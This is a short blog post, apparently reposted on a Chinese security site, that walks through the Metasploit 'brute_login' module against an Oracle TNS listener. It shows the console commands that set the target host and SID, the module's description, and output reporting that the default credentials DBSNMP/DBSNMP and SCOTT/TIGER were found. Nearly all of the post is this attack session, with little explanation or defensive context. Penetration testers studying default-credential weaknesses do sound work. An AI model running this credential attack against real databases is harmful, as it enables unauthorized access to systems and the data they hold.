Oracle Pwnage with the Metasploit Oracle Modules Part 4 's

admin 2017年5月1日23:11:09评论302 views字数 770阅读2分34秒阅读模式
摘要

Posted by CGThank MC for this one…http://metasploit.com/users/mc/oracle9i/brute_login.rbmsf > use auxiliary/admin/oracle/brute_login
msf auxiliary(brute_login) > set RHOST 172.16.102.130
RHOST => 172.16.102.130
msf auxiliary(brute_login) > info

Name: Oracle bruteforcer for known default accounts.
Version: $Revision:$

Posted by CG

Thank MC for this one…

http://metasploit.com/users/mc/oracle9i/brute_login.rb

msf > use auxiliary/admin/oracle/brute_login
msf auxiliary(brute_login) > set RHOST 172.16.102.130
RHOST => 172.16.102.130
msf auxiliary(brute_login) > info

Name: Oracle bruteforcer for known default accounts.
Version: $Revision:$

Provided by:
MC

Basic options:
Name Current Setting Required Description
—- ————— ——– ———–
RHOST 172.16.102.130 yes The Oracle host.
RPORT 1521 yes The TNS port.
SID DEMO yes The sid to authenticate with.

Description:
This module uses a list of well known authentication credentials for bruteforcing the TNS service.

msf auxiliary(brute_login) > set SID unbreakable
SID => unbreakable
msf auxiliary(brute_login) > run

[*] Found user/pass of: DBSNMP/DBSNMP…
[*] Found user/pass of: SCOTT/TIGER…
[*] Auxiliary module execution completed
msf auxiliary(brute_login) >

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2017年5月1日23:11:09
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Oracle Pwnage with the Metasploit Oracle Modules Part 4 'shttp://cn-sec.com/archives/45834.html

发表评论

匿名网友 填写信息